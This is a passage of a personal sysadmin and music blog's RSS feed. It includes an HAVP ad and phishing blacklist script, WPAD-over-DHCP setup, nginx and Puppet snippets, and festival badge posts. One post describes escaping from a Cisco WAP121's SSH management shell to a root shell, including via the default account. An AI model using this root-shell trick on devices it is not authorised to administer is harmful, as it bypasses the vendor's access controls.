  6074. Currently I'm using the version below which runs in a cronjob every two hours and keeps the HAVP blacklist up-to-date. Please note that you need to insert your own free PhishTank API key when using this script.</p>
  6075. <pre>
  6076. #!/bin/sh
  6078. cd /etc/havp
  6080. OUTFILE=/etc/havp/blacklist
  6082. ADSERVERLIST=/etc/havp/adserverlist
  6083. PHISHTANK=/etc/havp/phishtank
  6084. MYBLACKLIST=/etc/havp/myblacklist
  6086. wget -q -N ";showintro=0;mimetype=plaintext"
  6087. sed -e 's_^//_#_g' serverlist.php* | sort | uniq &gt; $ADSERVERLIST
  6089. wget -q -N;PhishTank API key&gt;/online-valid.csv.bz2
  6090. bzcat online-valid.csv.bz2 | sed \
  6091. -e 's/^[0-9]*,//' \
  6092. -e 's@,[0-9]*,.*$@@' \
  6093. -e 's/^"\(.*\)"$/\1/'  \
  6094. -e 's_^https\?://__' \
  6095. -e 's_/$_/*_' \
  6096. -e 's_^\([^/]*\)$_\1/*_' \
  6097. -e 's/?.*/*/' | \
  6098. grep -vF 'phish_id,url,phish_detail_url,submission_time,verified,verification_time,online,target' | \
  6099. iconv -f utf8 -t ascii -c - | sort | uniq &gt; $PHISHTANK
  6102. echo "# blacklist file generated by $0, `date`" &gt; $OUTFILE
  6104. echo "\n# MYBLACKLIST:" &gt;&gt; $OUTFILE
  6105. cat $MYBLACKLIST &gt;&gt; $OUTFILE
  6107. echo "\n# ADSERVERLIST:" &gt;&gt; $OUTFILE
  6108. cat $ADSERVERLIST &gt;&gt; $OUTFILE
  6110. echo "\n# PHISHTANK:" &gt;&gt; $OUTFILE
  6111. cat $PHISHTANK &gt;&gt; $OUTFILE
  6112. </pre>
  6113. ]]></description>
  6114.    <content:encoded><![CDATA[<p>For basic virus protection I'm running a proxy with <a href="" title="HTTP Anti-Virus Proxy">HAVP</a> and <a href="" title="Clam AntiVirus">ClamAV</a>.<br>
  6115. Since some time I was using HAVPs blacklist functionality to block Ads (by blacklisting * and *
  6116. As such a manual blacklist is not very efficient I wanted to have an auto-updating list of adservers, thus I started to write the shellscript below which generates an up-to-date blacklist based on the adserverlist from <a href="" title=""></a>.</p>
  6117. <p>Shortly after this I extended the script to also incorporate a Phising blacklist based on the data from <a href="" title="PhishTank">PhishTank</a>.<br>
  6118. Currently I'm using the version below which runs in a cronjob every two hours and keeps the HAVP blacklist up-to-date. Please note that you need to insert your own free PhishTank API key when using this script.</p>
  6119. <pre>
  6120. #!/bin/sh
  6122. cd /etc/havp
  6124. OUTFILE=/etc/havp/blacklist
  6126. ADSERVERLIST=/etc/havp/adserverlist
  6127. PHISHTANK=/etc/havp/phishtank
  6128. MYBLACKLIST=/etc/havp/myblacklist
  6130. wget -q -N ";showintro=0;mimetype=plaintext"
  6131. sed -e 's_^//_#_g' serverlist.php* | sort | uniq &gt; $ADSERVERLIST
  6133. wget -q -N;PhishTank API key&gt;/online-valid.csv.bz2
  6134. bzcat online-valid.csv.bz2 | sed \
  6135. -e 's/^[0-9]*,//' \
  6136. -e 's@,[0-9]*,.*$@@' \
  6137. -e 's/^"\(.*\)"$/\1/'  \
  6138. -e 's_^https\?://__' \
  6139. -e 's_/$_/*_' \
  6140. -e 's_^\([^/]*\)$_\1/*_' \
  6141. -e 's/?.*/*/' | \
  6142. grep -vF 'phish_id,url,phish_detail_url,submission_time,verified,verification_time,online,target' | \
  6143. iconv -f utf8 -t ascii -c - | sort | uniq &gt; $PHISHTANK
  6146. echo "# blacklist file generated by $0, `date`" &gt; $OUTFILE
  6148. echo "\n# MYBLACKLIST:" &gt;&gt; $OUTFILE
  6149. cat $MYBLACKLIST &gt;&gt; $OUTFILE
  6151. echo "\n# ADSERVERLIST:" &gt;&gt; $OUTFILE
  6152. cat $ADSERVERLIST &gt;&gt; $OUTFILE
  6154. echo "\n# PHISHTANK:" &gt;&gt; $OUTFILE
  6155. cat $PHISHTANK &gt;&gt; $OUTFILE
  6156. </pre>
  6157. ]]></content:encoded>
  6158.  </item>
  6160.  <item>
  6161.    <title>Automatic Proxy Configuration via DHCP</title>
  6162.    <link></link>
  6163.    <guid isPermaLink="true"></guid>
  6164.    <dc:creator>Andreas Jaggi</dc:creator>
  6165.    <creativeCommons:license></creativeCommons:license>
  6166.    <pubDate>Sun, 30 Dec 2012 19:39:00 +0100</pubDate>
  6167.    <category domain="">Networking</category>
  6168.    <description><![CDATA[<p>To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using <a href="" title="Web Proxy Autodiscovery Protocol">WPAD</a>.</p>
  6169. <p>For this setup, the following components are needed:</p>
  6170. <ol>
  6171. <li>A DHCP server which announces DHCP option 252 with the URL of the <a href="" title="Proxy auto config">PAC</a> file (wpad.dat).</li>
  6172. <li>A webserver which serves the wpad.dat file</li>
  6173. <li>A wpad.dat PAC file where the Proxy IP is defined</li>
  6174. </ol>
  6176. <p>On a MikroTik system, the DHCP server configuration looks like this:</p>
  6177. <pre>
  6178. /ip dhcp-server option
  6179. add code=252 name=local-pac-server value="\?"
  6180. /ip dhcp-server network
  6181. add address= dhcp-option=local-pac-server dns-server= gateway= netmask=24
  6182. </pre>
  6183. <p>Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.<br>With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.</p>
  6185. <p>Following the example above, on the machine, we serve the following <var>wpad.dat</var> file:</p>
  6186. <pre>
  6187. function FindProxyForURL ( url, host ) {
  6188. return "PROXY; DIRECT";
  6189. }
  6190. </pre>
  6192. <p>With this setup, all systems will use the proxy at and if the proxy is not available try to connect directly to the Internet.<br>
  6193. While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the <var>DIRECT</var> part in an enterprise setup.</p>
  6194. ]]></description>
  6195.    <content:encoded><![CDATA[<p>To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using <a href="" title="Web Proxy Autodiscovery Protocol">WPAD</a>.</p>
  6196. <p>For this setup, the following components are needed:</p>
  6197. <ol>
  6198. <li>A DHCP server which announces DHCP option 252 with the URL of the <a href="" title="Proxy auto config">PAC</a> file (wpad.dat).</li>
  6199. <li>A webserver which serves the wpad.dat file</li>
  6200. <li>A wpad.dat PAC file where the Proxy IP is defined</li>
  6201. </ol>
  6203. <p>On a MikroTik system, the DHCP server configuration looks like this:</p>
  6204. <pre>
  6205. /ip dhcp-server option
  6206. add code=252 name=local-pac-server value="\?"
  6207. /ip dhcp-server network
  6208. add address= dhcp-option=local-pac-server dns-server= gateway= netmask=24
  6209. </pre>
  6210. <p>Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.<br>With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.</p>
  6212. <p>Following the example above, on the machine, we serve the following <var>wpad.dat</var> file:</p>
  6213. <pre>
  6214. function FindProxyForURL ( url, host ) {
  6215. return "PROXY; DIRECT";
  6216. }
  6217. </pre>
  6219. <p>With this setup, all systems will use the proxy at and if the proxy is not available try to connect directly to the Internet.<br>
  6220. While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the <var>DIRECT</var> part in an enterprise setup.</p>
  6221. ]]></content:encoded>
  6222.  </item>
  6224.  <item>
  6225.    <title>Stripe CTF 2.0</title>
  6226.    <link></link>
  6227.    <guid isPermaLink="true"></guid>
  6228.    <dc:creator>Andreas Jaggi</dc:creator>
  6229.    <creativeCommons:license></creativeCommons:license>
  6230.    <pubDate>Tue, 28 Aug 2012 11:23:00 +0200</pubDate>
  6231.    <category domain="">Networking</category>
  6232.    <description><![CDATA[<p><a href="#" class="gone" title="Stripe: Capture The Flag"><img src="" height="274" width="387" alt="Stripe: Capture The Flag"></a></p>
  6233. ]]></description>
  6234.    <content:encoded><![CDATA[<p><a href="#" class="gone" title="Stripe: Capture The Flag"><img src="" height="274" width="387" alt="Stripe: Capture The Flag"></a></p>
  6235. ]]></content:encoded>
  6236.  </item>
  6238.  <item>
  6239.    <title> clone with nginx</title>
  6240.    <link></link>
  6241.    <guid isPermaLink="true"></guid>
  6242.    <dc:creator>Andreas Jaggi</dc:creator>
  6243.    <creativeCommons:license></creativeCommons:license>
  6244.    <pubDate>Sun, 05 Aug 2012 23:58:00 +0200</pubDate>
  6245.    <category domain="">Linux</category>
  6246.    <description><![CDATA[<p>Thanks to the <a href="" title="HttpEchoModule">ngx_echo</a> module, it is trivially easy to build a clone of the <a href="" title=""></a> service with <a href="" title="nginx">nginx</a>:</p>
  6247. <pre>
  6248. server {
  6249. listen 80;
  6250. listen [::]:80;
  6252. location / {
  6253. echo $remote_addr;
  6254. }  
  6255. }
  6256. </pre>
  6257. ]]></description>
  6258.    <content:encoded><![CDATA[<p>Thanks to the <a href="" title="HttpEchoModule">ngx_echo</a> module, it is trivially easy to build a clone of the <a href="" title=""></a> service with <a href="" title="nginx">nginx</a>:</p>
  6259. <pre>
  6260. server {
  6261. listen 80;
  6262. listen [::]:80;
  6264. location / {
  6265. echo $remote_addr;
  6266. }  
  6267. }
  6268. </pre>
  6269. ]]></content:encoded>
  6270.  </item>
  6272.  <item>
  6273.    <title>How to get a Rootshell on a Cisco WAP121</title>
  6274.    <link></link>
  6275.    <guid isPermaLink="true"></guid>
  6276.    <dc:creator>Andreas Jaggi</dc:creator>
  6277.    <creativeCommons:license></creativeCommons:license>
  6278.    <pubDate>Sun, 05 Aug 2012 20:02:00 +0200</pubDate>
  6279.    <category domain="">Networking</category>
  6280.    <description><![CDATA[<p>The <a href="" title="Cisco WAP121 Wireless-N Access Point with PoE">Cisco WAP121</a> runs a Linux based firmware. This is how you get a Rootshell on it:</p>
  6281. <ol>
  6282. <li>Login to the Web GUI of the WAP121 and enable the SSH management access</li>
  6283. <li>Login with SSH and enter this command: <code >sh</code></li>
  6284. </ol>
  6285. <p>
  6286. This probably works with the Cisco WAP321 as well (I only tested with the WAP121).<br>
  6287. Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: <code>ssh -l root@&lt;WAP121 IP&gt;</code>
  6288. </p>
  6289. ]]></description>
  6290.    <content:encoded><![CDATA[<p>The <a href="" title="Cisco WAP121 Wireless-N Access Point with PoE">Cisco WAP121</a> runs a Linux based firmware. This is how you get a Rootshell on it:</p>
  6291. <ol>
  6292. <li>Login to the Web GUI of the WAP121 and enable the SSH management access</li>
  6293. <li>Login with SSH and enter this command: <code >sh</code></li>
  6294. </ol>
  6295. <p>
  6296. This probably works with the Cisco WAP321 as well (I only tested with the WAP121).<br>
  6297. Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: <code>ssh -l root@&lt;WAP121 IP&gt;</code>
  6298. </p>
  6299. ]]></content:encoded>
  6300.  </item>
  6302.  <item>
  6303.    <title>Artiphys 2012</title>
  6304.    <link></link>
  6305.    <guid isPermaLink="true"></guid>
  6306.    <dc:creator>Andreas Jaggi</dc:creator>
  6307.    <creativeCommons:license></creativeCommons:license>
  6308.    <pubDate>Sat, 31 Mar 2012 09:04:00 +0200</pubDate>
  6309.    <category domain="">Badges</category>
  6310.    <description><![CDATA[<p>After the summer festivals of Sydney, now also the festivals in Switzerland start again.<br>First one this year: <a href="" title="Festival Artiphys">Artiphys 2012</a></p>
  6311. <p><img src="" alt="Artiphys 2012" height="312" width="225"></p>
  6312. <p><img src="" alt="Artiphys 2012" height="316" width="227"></p>
  6313. ]]></description>
  6314.    <content:encoded><![CDATA[<p>After the summer festivals of Sydney, now also the festivals in Switzerland start again.<br>First one this year: <a href="" title="Festival Artiphys">Artiphys 2012</a></p>
  6315. <p><img src="" alt="Artiphys 2012" height="312" width="225"></p>
  6316. <p><img src="" alt="Artiphys 2012" height="316" width="227"></p>
  6317. ]]></content:encoded>
  6318.  </item>
  6320.  <item>
  6321.    <title>Fix empty Puppet lsbdistcodename on Debian</title>
  6322.    <link></link>
  6323.    <guid isPermaLink="true"></guid>
  6324.    <dc:creator>Andreas Jaggi</dc:creator>
  6325.    <creativeCommons:license></creativeCommons:license>
  6326.    <pubDate>Tue, 14 Feb 2012 13:15:00 +0100</pubDate>
  6327.    <category domain="">Linux</category>
  6328.    <description><![CDATA[<p>While playing around with my <a href="" title="Puppet Labs: The Leading IT Automation Software Solution">Puppet</a> configuration I discovered that the 'system facts' returned by the <a href="" title="The Facter Program Quickly Gathers Basic Node Information">Facter</a> helper tool were not consistent on my Debian boxes.</p>
  6329. <p>On some machines Facter properly reported all <a href="" title="Linux Standard Base">LSB</a> related facts of the system, while on other machines it did not report any such information.<br>The problem occurred on about 50% of the hosts, so I excluded a bug introduced by manual over-tuning of the system configuration.</p>
  6330. <p>Further investigation showed that Facter uses the <code>lsb_release</code> command to collect the LSB information of the system.<br>On Debian this command is provided by the <code>lsb-release</code> package which was only installed on half of my systems...</p>
  6331. <p>Now my Puppet manifests include the following configuration directive which should prevent this problem in the future :-)</p>
  6332. <pre>
  6333. package { 'lsb-release':
  6334. ensure => installed,
  6335. }
  6336. </pre>
  6337. ]]></description>
  6338.    <content:encoded><![CDATA[<p>While playing around with my <a href="" title="Puppet Labs: The Leading IT Automation Software Solution">Puppet</a> configuration I discovered that the 'system facts' returned by the <a href="" title="The Facter Program Quickly Gathers Basic Node Information">Facter</a> helper tool were not consistent on my Debian boxes.</p>
  6339. <p>On some machines Facter properly reported all <a href="" title="Linux Standard Base">LSB</a> related facts of the system, while on other machines it did not report any such information.<br>The problem occurred on about 50% of the hosts, so I excluded a bug introduced by manual over-tuning of the system configuration.</p>
  6340. <p>Further investigation showed that Facter uses the <code>lsb_release</code> command to collect the LSB information of the system.<br>On Debian this command is provided by the <code>lsb-release</code> package which was only installed on half of my systems...</p>
  6341. <p>Now my Puppet manifests include the following configuration directive which should prevent this problem in the future :-)</p>
  6342. <pre>
  6343. package { 'lsb-release':
  6344. ensure => installed,
  6345. }
  6346. </pre>
  6347. ]]></content:encoded>
  6348.  </item>
  6350.  <item>
  6351.    <title>Big Day Out</title>
  6352.    <link></link>
  6353.    <guid isPermaLink="true"></guid>
  6354.    <dc:creator>Andreas Jaggi</dc:creator>
  6355.    <creativeCommons:license></creativeCommons:license>
  6356.    <pubDate>Sun, 29 Jan 2012 13:28:00 +0100</pubDate>
  6357.    <category domain="">Music</category>
  6358.    <description><![CDATA[<p>One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)</p>
  6359. <p>
  6360. Last thursday I went to the <a href="" title="Big Day Out (">Big Day Out</a> festival in <a href="" title="Big Day Out Sydney 2012 (">Sydney</a>.<br>
  6361. What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.</p>
  6362. <p>I really liked the performances of <a href="" title="Parkway Drive">Parkway Drive</a>, <a href="" title="MissKittin's Tree">Miss Kittin</a>, <a href="" title="Röyksopp">Röyksopp</a>, <a href="" title="BASSNECTAR">Bassnectar</a>, <a href="" title="Kasabian">Kasabian</a>, <a href="" title="Soundgarden World">Soundgarden</a> and <a href="" title="Regurgitator">Regurgitator</a>.<br>
  6363. Also it was nice to catch a glimpse of <a href="" title="The Jezabels">The Jezabels</a>, <a href="" title="HILLTOP HOODS : I LOVE IT">Hilltop Hoods</a>, <a href="" title="kittydaisyandlewis">Kitty, Daisy &amp; Lewis</a> and the show of <a href="" title="Kayne West (">Kayne West</a>.<br>
  6364. A bit disapointing was the performance of <a href="" title="Cavalera Conspiracy (">Cavalera Conspiracy</a>. They even had to fallback to popular <a href="" title="SEPULTURA.COM (">Sepultura</a> songs (<a href="" title="Sepultura - Refuse/Resist">Refuse/Resist</a>, <a href="" title="Sepultura - Roots Bloody Roots">Roots Bloody Roots</a>) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.<br>
  6365. Unfortunately the last train back was before the end of the festival and so I did miss <a href="" title="This Is Nero (">Nero</a>.</p>
  6367. <p>
  6368. <img src="" alt="Big Day Out branded Pineapple Drink" height="512" width="384">
  6369. <img src="" alt="Big Day Out Sydney Olympic Park Mainstages" height="384" width="512">
  6370. <img src="" alt="Big Day Out Ferris Wheel inside the 'Boiler Room' hall" height="512" width="384">
  6371. <img src="" alt="Miss Kittin @ Big Day Out" height="384" width="512">
  6372. <img src="" alt="Happy Beer @ Big Day Out" height="512" width="384">
  6373. <img src="" alt="Regurgitator @ Big Day Out" height="384" width="512">
  6374. <img src="" alt="Cavalera Conspiracy @ Big Day Out" height="512" width="384">
  6375. </p>
  6376. ]]></description>
  6377.    <content:encoded><![CDATA[<p>One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)</p>
  6378. <p>
  6379. Last thursday I went to the <a href="" title="Big Day Out (">Big Day Out</a> festival in <a href="" title="Big Day Out Sydney 2012 (">Sydney</a>.<br>
  6380. What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.</p>
  6381. <p>I really liked the performances of <a href="" title="Parkway Drive">Parkway Drive</a>, <a href="" title="MissKittin's Tree">Miss Kittin</a>, <a href="" title="Röyksopp">Röyksopp</a>, <a href="" title="BASSNECTAR">Bassnectar</a>, <a href="" title="Kasabian">Kasabian</a>, <a href="" title="Soundgarden World">Soundgarden</a> and <a href="" title="Regurgitator">Regurgitator</a>.<br>
  6382. Also it was nice to catch a glimpse of <a href="" title="The Jezabels">The Jezabels</a>, <a href="" title="HILLTOP HOODS : I LOVE IT">Hilltop Hoods</a>, <a href="" title="kittydaisyandlewis">Kitty, Daisy &amp; Lewis</a> and the show of <a href="" title="Kayne West (">Kayne West</a>.<br>
  6383. A bit disapointing was the performance of <a href="" title="Cavalera Conspiracy (">Cavalera Conspiracy</a>. They even had to fallback to popular <a href="" title="SEPULTURA.COM (">Sepultura</a> songs (<a href="" title="Sepultura - Refuse/Resist">Refuse/Resist</a>, <a href="" title="Sepultura - Roots Bloody Roots">Roots Bloody Roots</a>) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.<br>
  6384. Unfortunately the last train back was before the end of the festival and so I did miss <a href="" title="This Is Nero (">Nero</a>.</p>
  6386. <p>
  6387. <img src="" alt="Big Day Out branded Pineapple Drink" height="512" width="384">
  6388. <img src="" alt="Big Day Out Sydney Olympic Park Mainstages" height="384" width="512">
  6389. <img src="" alt="Big Day Out Ferris Wheel inside the 'Boiler Room' hall" height="512" width="384">
  6390. <img src="" alt="Miss Kittin @ Big Day Out" height="384" width="512">
  6391. <img src="" alt="Happy Beer @ Big Day Out" height="512" width="384">
  6392. <img src="" alt="Regurgitator @ Big Day Out" height="384" width="512">
  6393. <img src="" alt="Cavalera Conspiracy @ Big Day Out" height="512" width="384">
  6394. </p>
  6395. ]]></content:encoded>
  6396.  </item>
  6398.  <item>
  6399.    <title>Keren Ann</title>
  6400.    <link></link>
  6401.    <guid isPermaLink="true"></guid>
  6402.    <dc:creator>Andreas Jaggi</dc:creator>
  6403.    <creativeCommons:license></creativeCommons:license>
  6404.    <pubDate>Sun, 15 Jan 2012 12:52:00 +0100</pubDate>
  6405.    <category domain="">Music</category>
  6406.    <description><![CDATA[<p>Listening to <a href="" title="Keren Ann">Keren Ann</a> is just perfect when you have to work on a rainy Sunday.<br>Thank you <a href="" title="Metropop Festival Lausanne">Metropop</a> for showing me her music.</p>
  6407. <p><a href="" title="Keren Ann - My name is trouble - YouTube">Keren Ann - My name is trouble</a></p>
  6408. ]]></description>
  6409.    <content:encoded><![CDATA[<p>Listening to <a href="" title="Keren Ann">Keren Ann</a> is just perfect when you have to work on a rainy Sunday.<br>Thank you <a href="" title="Metropop Festival Lausanne">Metropop</a> for showing me her music.</p>
  6410. <p><a href="" title="Keren Ann - My name is trouble - YouTube">Keren Ann - My name is trouble</a></p>
  6411. ]]></content:encoded>
  6412.  </item>
  6414.  <item>
  6415.    <title>Sydney</title>
  6416.    <link></link>
  6417.    <guid isPermaLink="true"></guid>
  6418.    <dc:creator>Andreas Jaggi</dc:creator>
  6419.    <creativeCommons:license></creativeCommons:license>
  6420.    <pubDate>Sat, 07 Jan 2012 12:33:00 +0100</pubDate>
  6421.    <category domain="">Misc</category>
  6422.    <description><![CDATA[<p>Yesterday after work we had some beers at <a href="" title="The Local Taphouse">The Local Taphouse</a> (including some fine porter from <a href="" title="BrewDog | Scottish Craft Beer">BrewDog</a> to increase my shareholder value) and then we went on to go out in some clubs, <em>in shorts and flip-flops</em>.<br>Astonishingly we had no problems getting inside, anywhere else in the world this would not be possible!</p>
  6423. <p>This morning then up again for some early surfing at Bondi before all the tourists arrive.<br>And now chilling in my <a href="" title="Kammok">Kammok</a> under the trees in the frontyard :-)</p>
  6424. <p><img src="" alt="Frontyard Kammok" height="360" width="480"></p>
  6425. ]]></description>
  6426.    <content:encoded><![CDATA[<p>Yesterday after work we had some beers at <a href="" title="The Local Taphouse">The Local Taphouse</a> (including some fine porter from <a href="" title="BrewDog | Scottish Craft Beer">BrewDog</a> to increase my shareholder value) and then we went on to go out in some clubs, <em>in shorts and flip-flops</em>.<br>Astonishingly we had no problems getting inside, anywhere else in the world this would not be possible!</p>
  6427. <p>This morning then up again for some early surfing at Bondi before all the tourists arrive.<br>And now chilling in my <a href="" title="Kammok">Kammok</a> under the trees in the frontyard :-)</p>
  6428. <p><img src="" alt="Frontyard Kammok" height="360" width="480"></p>
  6429. ]]></content:encoded>
  6430.  </item>
  6432.  <item>
  6433.    <title>Packing</title>
  6434.    <link></link>
  6435.    <guid isPermaLink="true"></guid>
  6436.    <dc:creator>Andreas Jaggi</dc:creator>
  6437.    <creativeCommons:license></creativeCommons:license>
  6438.    <pubDate>Sat, 24 Dec 2011 11:49:00 +0100</pubDate>
  6439.    <category domain="">Misc</category>
  6440.    <description><![CDATA[<p>This morning I started to prepare the bagagges for my trip to <a href="" title="28th Chaos Computing Congress">28C3</a> and for the two months in Sydney.<br>
  6441. While stowing away all my stuff in boxes so I can sublet my room I found old boxes with stuff, which I did stow away over a year ago when I went to Sydney the last time and I've never even thought about since!</p>
  6442. <p>As I did not have time to open them today I don't even know what is in those boxes. Probably I should just throw them away when I come back from Sydney, there can't be anything important in there :-)</p>
  6443. ]]></description>
  6444.    <content:encoded><![CDATA[<p>This morning I started to prepare the bagagges for my trip to <a href="" title="28th Chaos Computing Congress">28C3</a> and for the two months in Sydney.<br>
  6445. While stowing away all my stuff in boxes so I can sublet my room I found old boxes with stuff, which I did stow away over a year ago when I went to Sydney the last time and I've never even thought about since!</p>
  6446. <p>As I did not have time to open them today I don't even know what is in those boxes. Probably I should just throw them away when I come back from Sydney, there can't be anything important in there :-)</p>
  6447. ]]></content:encoded>
  6448.  </item>
  6450.  <item>
  6451.    <title>Open Systems</title>
  6452.    <link></link>
  6453.    <guid isPermaLink="true"></guid>
  6454.    <dc:creator>Andreas Jaggi</dc:creator>
  6455.    <creativeCommons:license></creativeCommons:license>
  6456.    <pubDate>Sat, 24 Dec 2011 08:31:00 +0100</pubDate>
  6457.    <category domain="">Badges</category>
  6458.    <description><![CDATA[<p>Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my <a href="" title="Open Systems AG">Open Systems</a> nametag:</p>
  6459. <p><img src="" alt="Open Systems Nametag" height="62" width="203"></p>
  6460. ]]></description>
  6461.    <content:encoded><![CDATA[<p>Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my <a href="" title="Open Systems AG">Open Systems</a> nametag:</p>
  6462. <p><img src="" alt="Open Systems Nametag" height="62" width="203"></p>
  6463. ]]></content:encoded>
  6464.  </item>
  6466.  <item>
  6467.    <title>Soiree BAM</title>
  6468.    <link></link>
  6469.    <guid isPermaLink="true"></guid>
  6470.    <dc:creator>Andreas Jaggi</dc:creator>
  6471.    <creativeCommons:license></creativeCommons:license>
  6472.    <pubDate>Fri, 23 Dec 2011 08:43:00 +0100</pubDate>
  6473.    <category domain="">Badges</category>
  6474.    <description><![CDATA[<p>One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): Soiree BAM 2005</p>
  6475. <p><img src="" alt="Soiree BAM" height="145" width="179"></p>
  6476. ]]></description>
  6477.    <content:encoded><![CDATA[<p>One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): Soiree BAM 2005</p>
  6478. <p><img src="" alt="Soiree BAM" height="145" width="179"></p>
  6479. ]]></content:encoded>
  6480.  </item>
  6482.  <item>
  6483.    <title>Balelec 2005</title>
  6484.    <link></link>
  6485.    <guid isPermaLink="true"></guid>
  6486.    <dc:creator>Andreas Jaggi</dc:creator>
  6487.    <creativeCommons:license></creativeCommons:license>
  6488.    <pubDate>Thu, 22 Dec 2011 06:56:00 +0100</pubDate>
  6489.    <category domain="">Badges</category>
  6490.    <description><![CDATA[<p>There we go, the first year I participated as staff: <a href="" title="Festival Balelec EPFL">Festival Balelec 2005</a></p>
  6491. <p><img src="" alt="Balelec 2005" height="271" width="189"></p>
  6492. ]]></description>
  6493.    <content:encoded><![CDATA[<p>There we go, the first year I participated as staff: <a href="" title="Festival Balelec EPFL">Festival Balelec 2005</a></p>
  6494. <p><img src="" alt="Balelec 2005" height="271" width="189"></p>
  6495. ]]></content:encoded>
  6496.  </item>
  6498.  <item>
  6499.    <title>Balelec 2006</title>
  6500.    <link></link>
  6501.    <guid isPermaLink="true"></guid>
  6502.    <dc:creator>Andreas Jaggi</dc:creator>
  6503.    <creativeCommons:license></creativeCommons:license>
  6504.    <pubDate>Wed, 21 Dec 2011 08:11:00 +0100</pubDate>
  6505.    <category domain="">Badges</category>
  6506.    <description><![CDATA[<p>Luckily this one took place very year (for more than 30 years now!): <a href="" title="Festival Balelec EPFL">Festival Balelec 2006</a></p>
  6507. <p><img src="" alt="Balelec 2006" height="270" width="189"></p>
  6508. ]]></description>
  6509.    <content:encoded><![CDATA[<p>Luckily this one took place very year (for more than 30 years now!): <a href="" title="Festival Balelec EPFL">Festival Balelec 2006</a></p>
  6510. <p><img src="" alt="Balelec 2006" height="270" width="189"></p>
  6511. ]]></content:encoded>
  6512.  </item>
  6514.  <item>
  6515.    <title>Closedair 2006</title>
  6516.    <link></link>
  6517.    <guid isPermaLink="true"></guid>
  6518.    <dc:creator>Andreas Jaggi</dc:creator>
  6519.    <creativeCommons:license></creativeCommons:license>
  6520.    <pubDate>Tue, 20 Dec 2011 10:23:00 +0100</pubDate>
  6521.    <category domain="">Badges</category>
  6522.    <description><![CDATA[<p>Yet another great event which no longer exists: ClosedAir 2006</p>
  6523. <p><img src="" alt="Closedair 2006" height="155" width="242"></p>
  6524. ]]></description>
  6525.    <content:encoded><![CDATA[<p>Yet another great event which no longer exists: ClosedAir 2006</p>
  6526. <p><img src="" alt="Closedair 2006" height="155" width="242"></p>
  6527. ]]></content:encoded>
  6528.  </item>
  6530.  <item>
  6531.    <title>LinuxWorld 2007</title>
  6532.    <link></link>
  6533.    <guid isPermaLink="true"></guid>
  6534.    <dc:creator>Andreas Jaggi</dc:creator>
  6535.    <creativeCommons:license></creativeCommons:license>
  6536.    <pubDate>Mon, 19 Dec 2011 08:35:00 +0100</pubDate>
  6537.    <category domain="">Badges</category>
  6538.    <description><![CDATA[<p>Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007</p>
  6539. <p><img src="" alt="LinuxWorld 2007" height="158" width="247"></p>
  6540. ]]></description>
  6541.    <content:encoded><![CDATA[<p>Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007</p>
  6542. <p><img src="" alt="LinuxWorld 2007" height="158" width="247"></p>
  6543. ]]></content:encoded>
  6544.  </item>
  6546.  <item>
  6547.    <title>Artiphys 2008</title>
  6548.    <link></link>
  6549.    <guid isPermaLink="true"></guid>
  6550.    <dc:creator>Andreas Jaggi</dc:creator>
  6551.    <creativeCommons:license></creativeCommons:license>
  6552.    <pubDate>Sun, 18 Dec 2011 12:46:00 +0100</pubDate>
  6553.    <category domain="">Badges</category>
  6554.    <description><![CDATA[<p>And there the other student music festival which managed to provide badges: <a href="" title="Festival Artiphys">Artiphys 2008</a></p>
  6555. <p><img src="" alt="Artiphys 2008" height="189" width="269"></p>
  6556. ]]></description>
  6557.    <content:encoded><![CDATA[<p>And there the other student music festival which managed to provide badges: <a href="" title="Festival Artiphys">Artiphys 2008</a></p>
  6558. <p><img src="" alt="Artiphys 2008" height="189" width="269"></p>
  6559. ]]></content:encoded>
  6560.  </item>
  6562.  <item>
  6563.    <title></title>
  6564.    <link></link>
  6565.    <guid isPermaLink="true"></guid>
  6566.    <dc:creator>Andreas Jaggi</dc:creator>
  6567.    <creativeCommons:license></creativeCommons:license>
  6568.    <pubDate>Sat, 17 Dec 2011 17:09:00 +0100</pubDate>
  6569.    <category domain="">Linux</category>
  6570.    <description><![CDATA[<p>Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.</p>
  6572. <p>This script checks if a disk is more than 75% full.</p>
  6574. <pre>#!/bin/bash
  6576. df -h | awk '/%/ {
  6577.        limit = 75
  6578.        percent = sprintf("%d",$5)
  6579.        if ( percent > limit ) {
  6580.                print "Warning: ",$6," (",$1,") is to ",percent,"% full:"
